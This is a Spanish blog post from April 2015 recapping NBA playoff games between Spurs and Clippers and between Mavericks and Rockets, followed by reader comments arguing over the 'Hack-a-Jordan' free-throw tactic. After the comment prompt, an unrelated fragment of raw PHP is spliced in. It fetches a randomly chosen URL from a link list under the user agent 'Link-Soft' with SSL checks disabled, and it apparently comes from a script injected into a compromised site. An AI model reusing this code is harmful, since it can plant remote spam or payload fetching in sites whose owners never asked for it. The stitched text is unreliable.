La Crónica: Un ligero toquecito

29 de April de 2015 por txusma

¿Sería posible que Spurs y Clippers jugaran cada 2 ó 3 días durante uno o dos meses? ¡Qué pena nos va a dar cuando se acabe la eliminatoria! Tras decenas de jugadas, el partido de ayer se acabó decidiendo por un ligero toquecito de balón que no debió existir. Así es este deporte. Y en la otra serie que se disputó ayer, victoria de los Rockets que consiguen pasar ronda por primera vez desde 2009.

San Antonio Spurs 111 – LA Clippers 107

Esta serie se va a decidir por el canto de un duro, como el partido de ayer. Los Clippers salieron en tromba y a los 10 minutos ya mandaban por 14 puntos gracias principalmente a un Blake Griffin que anotó 13 puntos, capturó 6 rebotes y repartió 2 asistencias durante ese parcial. Sin embargo, los últimos 2 minutos del cuarto aguaron la fiesta de los locales porque los Spurs fueron capaces de rebajar la diferencia a 5 puntos gracias a un parcial de 9-0. A partir de ahí el partido fue completamente igualado, con pequeñas ventajas para ambos equipos, con mini-remontadas que permitían dar la vuelta al marcador una y otra vez. Los tejanos volvieron a utilizar el Hack-a-Jordan que tanta polémica está levantando aunque el pívot de los Clippers da la razón a los defensores de los Spurs con su 7 de 16 en tiros libres. A falta de 3 minutos y medio para el final los Spurs consiguirían despegarse gracias a Boris Diaw, que primero anotó un triple que ponía a los suyos 7 arriba y que 30 segundos más tarde anotaba otra canasta al límite de la posesión que mantenía la distancia. Los siguientes minutos estuvieron llenos de tensión que se tradujeron en varias pérdidas y fallos para ambos equipos y entre unas cosas y otras llegamos al momento clave del partido y quién sabe si de la eliminatoria: Con los Clippers 1 abajo a falta de 7 segundos, Blake Griffin recibe el balón en la línea de tiros libres y lanza una bombita sobre Tim Duncan. El balón se pasea por el aro y DeAndre Jordan palmea para acabar introduciéndolo en la canasta aunque de manera precipitada. Los árbitros pitaron goal tending tras revisar la jugada y los tiros libres acabaron de amarrar la victoria de los campeones. 

MVP: Blake Griffin a pesar de la derrota (30 puntos, 14 rebotes, 7 asistencias y 4 robos)

Dallas Mavericks 94 – Houston Rockets 103

Los locales dominaron de principio a fin pero no pudieron relajarse en ningún momento. Tras ponerse por delante en un par de ocasiones en los primeros 4 minutos, los Mavericks ya no fueron capaces de empatar en todo lo quedaba de partido aunque nunca se rindieron. Esta vez Barea y Aminu no fueron un factor y fueron nuevamente Monta Ellis y Dirk Nowitzki los que comandaron a los suyos de manera desesperada. Enfrente, los Rockets fueron a arreones. Cuando veían que los Mavs se acercaban, apretaban un poco y volvían a escaparse gracias a un pequeño parcial favorable con James Harden y Dwight Howard como principales protagonistas. Los Mavs intentaron romper el ritmo de los locales haciendo faltas a Howard y Josh Smith pero su falta de acierto desde más allá de la línea (5 de 16 en T3) no les permitió culminar ninguno de sus intentos de remontada. De todas maneras, los Mavs se las arreglaron para ponerse a 3 puntos a falta de 5 minutos para el final pero entre Terrence Jones (enorme último cuarto el suyo) y James Harden acabaron enterrando sus posibilidades de victoria.

MVP: James Harden (28 puntos y 8 asistencias) y Dwight Howard (18 puntos, 19 rebotes, 4 tapones y 4 robos)

Comenta

10 comentarios a esta entrada

  1. jmpa dice:
    #1

    No entiendo la polémica con el hack a Jordan o hack a Dwight o hack a quien sea. No es ilegal, ni siquiera creo que se antideportivo. Si hay equipos que tienen jugadores que no meten un tiro libre a una piscina olímpica es su problema. El resto deben aprovechar esa debilidad lo mismo que Jordan aprovecha su altura y salto frente a otros que no tienen ni de lo uno ni de lo otro.

    No creo que los Clippers sean capaces de volver a ganar en San Antonio.
    Me sorprende lo poco que confía Rivers en su banquillo. No hay más que ver los minutos entre ambos equipos en el partido de esta noche. Aunque pasen, que lo dudo mucho, llegarían reventados a la siguiente ronda.

      Citar

  2. txusma dice:
    #2

    jmpa:
    No entiendo la polémica con el hack a Jordan o hack a Dwight o hack a quien sea. No es ilegal, ni siquiera creo que se antideportivo. Si hay equipos que tienen jugadores que no meten un tiro libre a una piscina olímpica es su problema. El resto deben aprovechar esa debilidad lo mismo que Jordan aprovecha su altura y salto frente a otros que no tienen ni de lo uno ni de lo otro.

    Esto ya está discutido. Como dije antes por la misma regla de 3 no sé pq tuvieron que poner la norma de 24 segundos por posesión…

      Citar

  3. Triceratops dice:
    #3

    txusma: Esto ya está discutido. Como dije antes por la misma regla de 3 no sé pq tuvieron que poner la norma de 24 segundos por posesión…

    Agree… Tambien era problema del resto de los equipos el que no pudieran parar a Wilt Chamberlain, y así se inventaron eso de los 3 segundos en zona.

      Citar

  4. Ruxixón dice:
    #4

    A cuento de lo que acabáis de decir por Twitter,39 años recién cumplidos y viéndole cualquiera le anima a tirar otro par de temporadas más en activo aprovechando la misma filosofía de dosificación que sigue Popovich.Además que se le ve con la misma pasión por este deporte…en fin,que vaya lujo ver esos clínics de Tim “Siglo XXI”.

      Citar

  5. Jose Luis dice:
    #5

    Triceratops: Agree… Tambien era problema del resto de los equipos el que no pudieran parar a Wilt Chamberlain, y así se inventaron eso de los 3 segundos en zona.

    Ahí está lo que no veis 😛

    Era problema de todos los equipos no poder parar a Wilt

    Es problema de… 1, 2, 3 equipos los de los tiros libres. Y un problema fácilmente solucionable, entrena tiros libres hasta que se te caigan los brazos, o al banquillo

      Citar

  6. Romino dice:
    #6

    Lo mejor para el espectáculo sería eliminar los tiros libres y que hagan un mate con los ojos cerrados…también si no sabes botar bien (si damos ventaja al pobre que no sabe tirar libres…pronto pasará) que se pueda no botar si mides más de dos metro y pico…y ya de paso un chino en cada ekipo para más audiencia…
    Ahora en serio…creo que hay argumentos en ambos sentidos pero no creo que nivelar el juego beneficiando al malo sea ir a más espectáculo…complicado asunto

      Citar

  7. TheDeerHunter dice:
    #7

    Ni al bueno ni al malo. Hay que beneficiar al juego en sí.
    Un jugador que lance mal los tiros libres seguiría estando penalizado por no poder recibir el balón tan a menudo y cada vez que agarre un rebote le van a dar hasta en el carnet.
    Eso sigue siendo castigo suficiente sin necesidad de martirizarnos a los espectadores con algo que no tiene el más mínimo sentido.

    No corregir esta situación sólo beneficia al infractor. Creo que un reglamento coherente jamás debe beneficiar al que lo quebranta.

      Citar

  8. GreenPride dice:
    #8

    Partidazo de los grandes el de LA. Lo siento pero no puedo estar de acuerdo en el MVP para Griffin. 21 ptos al descanso, 9 después, 1/9 en el último cuarto no da para MVP de un partido tan igualado y tan importante ya que no fue decisivo en los momentos calientes. MVP para “Cocoon” Duncan que sí que fue decisivo junto a Diaw en los momentos calientes. Eso y la empanada de los Clippers en 2 o 3 acciones (palmeo de Jordan, rebote que dejan coger en ataque a Green de su propio tiro libre).
    Los Spurs tienen siete vidas y Pops es un genio y ambas cosas ya las sabiamos. Que nos están matando en el primer cuarto, pues zona 2-3 de ajustes y 9-0 de parcial. Que empiezan a correr y no podemos seguirles pues hack-a-DeAndre y paro el ritmo y en el clutch son los reyes. No creo que la eliminatoria vuelva a LA, lástima porque un séptimo sería la leche

      Citar

  9. Jose Luis dice:
    #9

    Love out for season… a ver si los Bulls hacen su trabajo hoy

      Citar

  10. Ruxixón dice:
    #10

    Jose Luis:
    Love out for season… a ver si los Bulls hacen su trabajo hoy

    Pues las opciones de Cleveland bajan muchísimo.Directamente la lesión de Love abre la puerta a más minutos de James Jones y a la entrada en la rotación de Marion.No sé yo de ser Blatt si colocaría a Tristan Thompson en el lugar de Love dentro del quinteto,casi que metería a Jones con James de 4 para que Pau y Noah sufran saliendo fuera de la pintura a defender.De todas formas que se clasifiquen los Bulls y luego ya veremos,que no veo claro que no llegue la cosa al 7º y ahí a saber.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>